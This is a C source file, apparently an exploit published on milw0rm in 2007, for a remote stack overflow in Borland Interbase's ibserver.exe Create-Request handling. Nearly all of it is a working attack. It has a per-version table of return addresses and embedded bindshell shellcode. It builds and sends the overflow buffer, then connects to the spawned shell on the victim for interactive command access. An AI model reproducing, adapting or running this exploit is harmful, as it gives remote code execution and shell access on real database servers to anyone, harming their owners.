Borland Interbase <= 2007 SP1 Create-Request Remote Overflow Exploit



/*


    http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064882.html

    Groetjes aan mijn sletjes: Doopie, Sjaakhans, [PS] en Sleepwalker :P
    All your base are belong to FD2K2!

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")

#define IB_PORT "3050"
// 0xFF - 0x8, jmp 8 bytes back
#define JMP "\x90\x90\xEB\xF7"
// 0xFFFFFFFF - (sizeof(shellcode) + BIG_JMP SIZE), jmp to beginning of shellcode
CHAR BIG_JMP[]="\xE9\xFF\xFF\xFF\xFF";
// BIG_JMP SIZE
#define BIG_JMP_SIZE 5

CHAR ASCII_SHIT[]=
"\r\n                   >__            _      ___\r\n"
"                  / __\\26/07/2007| | __ / __\\ ___  _ __   ___ \r\n"
"                 /__\\/// _` |/ __| |/ //__\\/// _ \\| '_ \\ / _ \\\r\n"
"                / \\/  \\ (_| | (__|   </ \\/  \\ (_) | | | |  __/\r\n"
"                \\_____/\\__,_|\\___|_|\\_\\_____/\\___/|_| |_|\\___>\r\n"
"                     _______________BackBone_(c)_2007_______\r\n\r\n";

struct
{
    char* cVersion;
    DWORD dwRet;
    DWORD dwLength1;
    DWORD dwLength2;
}
targets[]=
{
    {"Interbase Server 2007 <=SP1 v8.0.0.123-w32 (UNIVERSAL)",0x403D4D,2108,0x2000}, // pop,pop,ret ibserver.exe v8.0.0.123
    {"Interbase Server v7.5.0.129-w32 (UNIVERSAL)",0x403A5D,2108,0x2000}, // pop,pop,ret ibserver.exe v7.5.0.129
    {"Interbase Server v7.1.0.181-w32 (UNIVERSAL)",0x4039BD,1336,0x2000}, // pop,pop,ret ibserver.exe v7.1.0.181
    {"Interbase Server v6.0.1.6-w32 (UNIVERSAL) untested",0x403901,1336,0x2000}, // pop,pop,ret ibserver.exe v6.0.1.6
 },v;

// don't change the offset
#define PORT_OFFSET 170
#define BIND_PORT 10282

// bindshell shellcode from www.metasploit.com,mod by skylined
unsigned char shellcode[] =
  "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
  "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
  "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
  "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
  "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
  "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
  "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
  "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
  "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
  "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
  "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
  "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
  "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"
  "\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"
  "\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"
  "\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"
  "\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"
  "\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"
  "\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"
  "\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"
  "\x83\xc4\x5c\x61\xeb\x89";

#define SET_BIND_PORT(p) *(USHORT*)(shellcode+PORT_OFFSET)=htons(p);

unsigned long lookupaddress(const char* pchost)
{
    unsigned long nremoteaddr = inet_addr(pchost);

    if (nremoteaddr == INADDR_NONE)
    {
        struct hostent* phe = gethostbyname(pchost);

        if (phe == 0)
            return INADDR_NONE;
        nremoteaddr = *((u_long*)phe->h_addr_list[0]);
    }
    return nremoteaddr;
}

void showusage(char* argv)
{
    int i;

    printf("[*] Usage: %s ip[:port] target [bindport]\r\n", argv);
    printf("[*] Standard port=%d, Standard bindport=%d.\r\n",atoi(IB_PORT),BIND_PORT);
    printf("[*] Targets:\r\n\r\n");
    for (i=0;i<(sizeof(targets)/sizeof(v));i++)
        printf("\t%2d: %s\r\n",i,targets[i].cVersion);
}

void showinfo(void)
{
    printf("%s",ASCII_SHIT);
    printf("    Borland Interbase ibserver.exe Create-Request Buffer Overflow Vulnerability\r\n");
    printf("                       Advisory provided by TPTI-07-13.\r\n");
    printf("                            Exploit by BackBone.\r\n\r\n");
}

/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
{
    int l;
    char buf[512];
    struct    timeval time;
    unsigned long    ul[2];

    time.tv_sec = 1;
    time.tv_usec = 0;

    while(1)
    {
        ul[0]=1;
        ul[1]=sock;

        l=select(0,(fd_set*)&ul,NULL,NULL,&time);
        if(l==1)
        {
            l=recv(sock,buf,sizeof(buf),0);
            if (l<=0)
            {
                printf("\r\n[-] connection closed.\n");
                return;
            }
            l=write(1,buf,l);
            if (l<=0)
            {
                printf("\r\n[-] connection closed.\n");
                return;
            }
        }
        else
            {
            l=read(0,buf,sizeof(buf));
            if (l<=0)
            {
                printf("\r\n[-] connection closed.\n");
                return;
            }
            l=send(sock,buf,l,0);
            if (l<=0)
            {
                printf("\r\n[-] connection closed.\n");
                return;
            }
        }
    }
}

int main(int argc, char *argv[])
{
    char *host,*port;
    unsigned long ulip;
    WSADATA wsa;
    SOCKET s;
    struct sockaddr_in sock_in;
    char buffer[16384];
    int bind,type;
    unsigned int size=0;
    DWORD dwLen1,dwLen2;
    DWORD dwBigJmp=0xFFFFFFFF;
    int i;

    showinfo();

    if (argc<3 || argc>4)
    {
        showusage(argv[0]);
        return -1;
    }

    host=strtok(argv[1],":");
    if((port=strtok(NULL,":"))==0)
        port=IB_PORT;

    if (WSAStartup(MAKEWORD(1,0),&wsa)!=0)
    {
        printf("[-] WSAStartup() error.\r\n");
        return -1;
    }

    ulip=lookupaddress(host);
    if (ulip==INADDR_ANY || ulip==INADDR_NONE)
    {
        printf("[-] invalid ip or host.\r\n");
        return -1;
    }

    if (atoi(port)<0 || atoi(port)>65534)
    {
        printf("[-] invalid port.\r\n");
        return -1;
    }

    type=atoi(argv[2]);
    if (type>(sizeof(targets)/sizeof(v))-1 || type<0)
    {
        printf("[-] invalid target type.\r\n");
        return -1;
    }

    printf("[+] Target: %s\r\n",targets[type].cVersion);

    bind=BIND_PORT;
    if (argc==4)
    {
        if (atoi(argv[3])>0 && atoi(argv[3])<65535)
            bind=atoi(argv[3]);
    }
    SET_BIND_PORT(bind);

    s=socket(AF_INET, SOCK_STREAM,0);
    if (s==INVALID_SOCKET)
    {
        printf("[-] socket() error.\r\n",s);
        return -1;
    }

    sock_in.sin_port=htons((u_short)atoi(port));
    sock_in.sin_family=AF_INET;
    sock_in.sin_addr.s_addr=ulip;

    printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulip&0xff,(ulip>>8)&0xff,
        (ulip>>16)&0xff,(ulip>>24)&0xff,atoi(port));

    if (connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in))==SOCKET_ERROR)
    {
        printf("Failed!\r\n");
        closesocket(s);
        WSACleanup();
        return -1;
    }

    printf("Ok.\r\n");

    // constructing the buffer
    memset(buffer,0,16384);

    memcpy(buffer,"\x00\x00\x00\x14\x00\x00\x00\x03",8);
    size+=8;

    dwLen1=htonl(targets[type].dwLength1+(sizeof(DWORD)*3));

    memcpy(buffer+size,&dwLen1,sizeof(DWORD));
    size+=sizeof(DWORD);

    memset(buffer+size,0x90,targets[type].dwLength1-(sizeof(shellcode)+BIG_JMP_SIZE));
    size+=targets[type].dwLength1-(sizeof(shellcode)+BIG_JMP_SIZE);

    // shellcode
    memcpy(buffer+size,shellcode,sizeof(shellcode));
    size+=sizeof(shellcode);

    // jump to shellcode (0xFFFFFFFF - (sizeof(shellcode)+BIG_JMP_SIZE)
    dwBigJmp-=sizeof(shellcode)+BIG_JMP_SIZE;
    // prepare jump code
    memcpy(BIG_JMP+1,&dwBigJmp,sizeof(DWORD));
    // write big jump code
    memcpy(buffer+size,BIG_JMP,BIG_JMP_SIZE);
    size+=BIG_JMP_SIZE;

    // jmp 8 bytes back
    memcpy(buffer+size,JMP,sizeof(DWORD));
    size+=sizeof(DWORD);

    // return addr
    memcpy(buffer+size,&targets[type].dwRet,sizeof(DWORD));
    size+=sizeof(DWORD);

    memset(buffer+size,0xFF,sizeof(DWORD));
    size+=sizeof(DWORD);

    dwLen2=htonl(targets[type].dwLength2);

    memcpy(buffer+size,&dwLen2,sizeof(DWORD));
    size+=sizeof(DWORD);

    memset(buffer+size,0x90,targets[type].dwLength2);
    size+=targets[type].dwLength2;

    printf("[+] Sending buffer (len: %u) ... ",size);

    if (!send(s,buffer,size,0))
    {
        printf("Failed.\r\n");
        closesocket(s);
        WSACleanup();
        return -1;
    }

    printf("Ok.\r\n");

    closesocket(s);

    Sleep(1000);

    printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulip&0xff,(ulip>>8)&0xff,
                (ulip>>16)&0xff,(ulip>>24)&0xff,bind);

    s=socket(AF_INET, SOCK_STREAM,0);
    if (s==INVALID_SOCKET)
    {
        printf("socket() error.\r\n",s);
        WSACleanup();
        return -1;
    }

    sock_in.sin_port=htons((u_short)bind);
    sock_in.sin_family=AF_INET;
    sock_in.sin_addr.s_addr=ulip;

    if (connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in))==SOCKET_ERROR)
    {
        printf("Failed!\r\n");
        closesocket(s);
        WSACleanup();
        return -1;
    }

    printf("Ok!\r\n\r\n--- w000t w000t ---\r\n\r\n");

    shell(s);

    closesocket(s);

    WSACleanup();

    return 0;
}

// milw0rm.com [2007-07-30]